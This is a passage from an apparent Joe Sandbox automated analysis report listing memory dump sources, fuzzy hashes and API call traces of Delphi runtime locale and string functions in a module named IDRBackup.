                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f4b6d3c4bfe2e57a8b7fed201a702f29ac867465c00b920c23a26741492a280d
                                                                                                  • Instruction ID: d2b6273b6703b3d88bcc40d787116e7a0318eb56f86772c93eb29266fab1835a
                                                                                                  • Opcode Fuzzy Hash: f4b6d3c4bfe2e57a8b7fed201a702f29ac867465c00b920c23a26741492a280d
                                                                                                  • Instruction Fuzzy Hash: 6011747164D3C26ED70B9B7898BE993BF685F0312030F84DBD8859F0A7D2945446DB36
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cdfee83b82c565a4e7ac9c4da2d0d7cecea1a54780142729f15290b8ecaf0d14
                                                                                                  • Instruction ID: 7b16072ced5c5b054f7ef6ec151deeaa3e20a332d68b347ac5da73dca5b72b95
                                                                                                  • Opcode Fuzzy Hash: cdfee83b82c565a4e7ac9c4da2d0d7cecea1a54780142729f15290b8ecaf0d14
                                                                                                  • Instruction Fuzzy Hash: FA11509150D3D21ECB0B8A3899AD643BF290F0742470F89DFD8C9EF1A7E2809846C776
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b7795690fc472fc05c8e4f1721952c89e46b387116118b94d48d187edd653a6d
                                                                                                  • Instruction ID: 1336c1c6c869dfbdec52380e2819109f2de454913a1383410b7eb0fe453b020a
                                                                                                  • Opcode Fuzzy Hash: b7795690fc472fc05c8e4f1721952c89e46b387116118b94d48d187edd653a6d
                                                                                                  • Instruction Fuzzy Hash: 5211956164D3C26ED70B9B789CAD993BF684F0312030F84DBD885DF0A7D2985446DB36
                                                                                                  APIs
                                                                                                  • IsValidLocale.KERNEL32(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002909F
                                                                                                  • GetThreadLocale.KERNEL32(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290AC
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290C9
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290D4
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290E9
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290F3
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002910A
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029114
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029127
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002913B
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029154
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002915E
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029171
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002918A
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291A0
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291B5
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291CB
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291DB
                                                                                                    • Part of subcall function 50025BC4: GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,50028D40,00000000,50028F6A,?,?,00000000,00000000), ref: 50025BD7
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291F4
                                                                                                    • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                    • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291FF
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029214
                                                                                                    • Part of subcall function 50025B78: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,00000100), ref: 50025BB5
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002921F
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029229
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029233
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029248
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029252
                                                                                                    • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029263
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029272
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029287
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029291
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292AA
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292B4
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292C5
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292D4
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,:mm,?,?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292EF
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,:mm:ss,?,?,?,:mm,?,?,?,00000001,00000000,5002933E), ref: 5002930A
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,:mm:ss,?,?,?,:mm,?,?,?,00000001,00000000,5002933E), ref: 5002931A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$String$Sysutils@$Locale$System@@$Asg$qqrr20Stringx20$Str$qqriix20$Def$qqrx20Stringi$Char$qqriib$FreeInfoMem$qqrpvN$qqrv$CharFromLen$qqrr20Long$qqrx20Move$qqrpxvpviString$qqriStringpbiStringriThreadValid
                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                  • API String ID: 1591733115-2493093252
                                                                                                  • Opcode ID: d39b3aeaf06a43d5e51a57cb72a8f0b0344bee30f2a786df34325c6a8d5a2eb3
                                                                                                  • Instruction ID: c56b8177db0a57ba453c3af60c07cd0ceb7fdab362b64694d1a226fae421d36e
                                                                                                  • Opcode Fuzzy Hash: d39b3aeaf06a43d5e51a57cb72a8f0b0344bee30f2a786df34325c6a8d5a2eb3
                                                                                                  • Instruction Fuzzy Hash: 047158317022CA9BDF01DBE4F891ADEB3BADF98300F908637B105AB656D635DD058794
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(00000000,50028F6A,?,?,00000000,00000000), ref: 50028CC2
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028CD6
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028CE3
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028CF8
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D02
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028D1C
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D26
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D3B
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D51
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028D6C
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D76
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D8B
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028DA6
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028DBE
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028DD3
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028DEB
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028DFB
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028E16
                                                                                                    • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                    • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E23
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028E38
                                                                                                    • Part of subcall function 50025B78: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,00000100), ref: 50025BB5
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E45
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E4F
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E59
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028E6E
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E78
                                                                                                    • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E89
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E98
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028EAD
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028EB7
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028ED0
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028EDA
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028EEB
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028EFA
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,:mm,?,?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028F17
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,:mm:ss,?,?,?,:mm,?,?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028F34
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,:mm:ss,?,?,?,:mm,?,?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028F44
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$String$Sysutils@$System@@$Locale$Asg$qqrr20Stringx20$Str$qqriix20$Def$qqrx20Stringi$Char$qqriib$FreeMem$qqrpvN$qqrv$CharFromInfoLen$qqrr20Long$qqrx20Move$qqrpxvpviString$qqriStringpbiStringriThread
                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                  • API String ID: 2238068362-2493093252
                                                                                                  • Opcode ID: 578a5909f94e02bd4f20fe4711f945c39aa07445c328b27e69a5ead81c01f26d
                                                                                                  • Instruction ID: a8aad9425a59888f8c7a4424cecd7dbef86d1a9361a3f9030e8a3f94b0420b5d
                                                                                                  • Opcode Fuzzy Hash: 578a5909f94e02bd4f20fe4711f945c39aa07445c328b27e69a5ead81c01f26d
                                                                                                  • Instruction Fuzzy Hash: 0E7170346031CA9BEF41EBE4FC916DE737A9F98300F908636F100AB256DB39D94587A4
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026036
                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002603F
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002604E
                                                                                                    • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                    • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002605B
                                                                                                    • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260A5
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260AF
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260B8
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260BD
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260D0
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260F2
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@CharLength$qqrx20System@UnicodeStringi.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026110
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002612B
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026135
                                                                                                  • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026153
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026163
                                                                                                  • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002617F
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002618F
                                                                                                    • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                    • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                    • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                    • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                  • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500261AA
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500261BA
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026202
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026207
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
